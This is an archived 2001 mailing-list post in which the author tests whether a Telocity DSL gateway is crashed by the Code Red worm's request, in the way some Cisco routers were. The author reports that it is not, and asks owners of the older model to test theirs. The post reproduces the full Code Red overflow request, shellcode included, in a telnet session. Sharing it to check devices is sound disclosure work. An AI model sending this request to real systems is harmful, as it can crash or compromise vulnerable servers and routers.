-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Hi folks, Lately I had to reset my Telocity/Direct TV DSL gateway many times. I thought it had something to do with code red so I started playing around with it. Just like the Cisco DSL routers, the Telocity gateway has a web interface. It lets you check connection status and stats on the gateway, but won't let you change any configuration. It looks like the Telocity x2 model does not suffer from the issue that most of Cisco's DSL routers suffer from. After issuing the same request that code red sends out, my Telocity gateway stayed running. $ telnet 12.34.56.78 80 Trying 12.34.56.78... Connected to 12.34.56.78. Escape character is '^]'. GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 HTTP/1.0 501 Not Implemented Connection: close Server: Gateway WindWeb/1.1 Date: THU JAN 01 14:42:47 1970 Content-Type: text/html WWW-Authenticate: Basic realm="Gateway" Telocity Expressway Web Server Error Report: V1.1<HR> <H1>Server Error: 501 Not Implemented</H1> Operating System Error Nr:3997700: errno = 0x3d0004 <P><HR><H2>No RPM for this combination of URL and method</H2><P><HR>please mail problems to supportat_private <A HREF="mailto:supportat_private"><ADDRESS> Telocity Communications Inc. 10355 N. De Anza Blvd. San Jose, CA, 95014-2027</ADDRESS></A> Connection closed by foreign host. 12.34.56.78 is my gateway's IP. If the gateway was vulnerable (which it's not obviously) this would not be an issue, since it only accepts connection to port 80 from certain IP addresses (like the DSL IP). I'm not sure if it accepts only the IPs it issues the DSL user, or IPs from the *.telocity.net network. If that is the case, then this would suck. I couldn't test the old model (x1) which is the boxy beige box, so if anyone has one of those please tell me if that one is vulnerable. Anway, just my $0.02 :-) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (NetBSD) Comment: http://network.asper.org/emre-dsa.asc iD8DBQE7cMwG28cbRfnkodERA8XVAJ98cLrzy5CwxVwzXly233RrnRGzTwCgrhk1 qGsnTdeDAJHMphSWKcuJoJM= =6ezu -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 17:44:51 PDT